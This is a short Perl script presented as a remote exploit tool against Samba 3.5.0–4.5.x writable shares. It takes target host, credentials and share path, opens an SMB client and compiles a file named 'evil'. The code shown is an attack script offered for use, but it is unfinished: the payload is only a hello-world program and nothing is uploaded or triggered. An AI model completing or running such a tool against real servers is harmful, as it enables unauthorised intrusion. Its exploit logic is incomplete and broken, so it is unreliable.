Untitled

#!/usr/bin/perl -w

use POSIX;
use Filesys::SmbClientParser;
use strict;
use warnings;
use Getopt::Long qw(GetOptions);

my $evil = "#include <stdio.h>\n".'int main(void) { printf("hello world\n"); return 0;}';
my $evil_file = 'evil.c';

sub create_evil()
{
	system("rm evil.c");	#incase it is lingering around from previous hack attempts
	system("rm evil");	#same as above
	open(my $fh, '>', $evil_file) or die "[*]Could not open evil.c";
	print $fh $evil;
	close $fh;
	system("gcc evil.c -o evil");
	print "[*]Evil File Created Successfully!\n";
}


sub usage()
{
	print "\n\n[*]Remote Samba 3.5.0 - 4.5.4/4.5.10/4.4.14 By N4ss4r - N_A\n\n";
	print "[*]Usage: $0 --host hostname --port port --user user --password pass --share /path/to/writeable/share\n";
	exit;
}


my $host;	#host to attack
my $port;	#port on host to attack , default is 445
my $user;	#username on host to use, default is nobody
my $password;	#password to use, default is left as blank
my $share;	#path to the writable share to use

GetOptions('host=s' => \$host, 'port=s' => \$port,'user=s' => \$user, 'password=s' => \$password, 'share=s' => \$share,) or die usage();


if(!$host)
{
	usage();
}

print "\n\n";

if(!$port)
{
	print "[*]No Port Specified - Using Port 445 as default\n";
	$port = 445;
}

if(!$user)
{
	print "[*]No user specified - Using 'nobody' as default user\n";
	$user = "nobody";
}

if(!$password)
{
	print "[*]No password specified - Leaving password blank\n";
	$password = "";
}


if(!$share)
{
	usage();
}


my $smb = new Filesys::SmbClientParser
  (undef,
   (
    user     => $user,
    password => $password
   ));


$smb->Host($host);

print "[*]Using Host: $host on port: $port\n";
print "[*]Getting Shares on Host: $host on port: $port\n";
print "[*]Username: $user\n";
print "[*]Password: $password\n";
print "[*]Attacking Share: $share on Host: $host Port: $port\n";

sleep(1);

print "[*]Creating Pure Evil\n";
create_evil();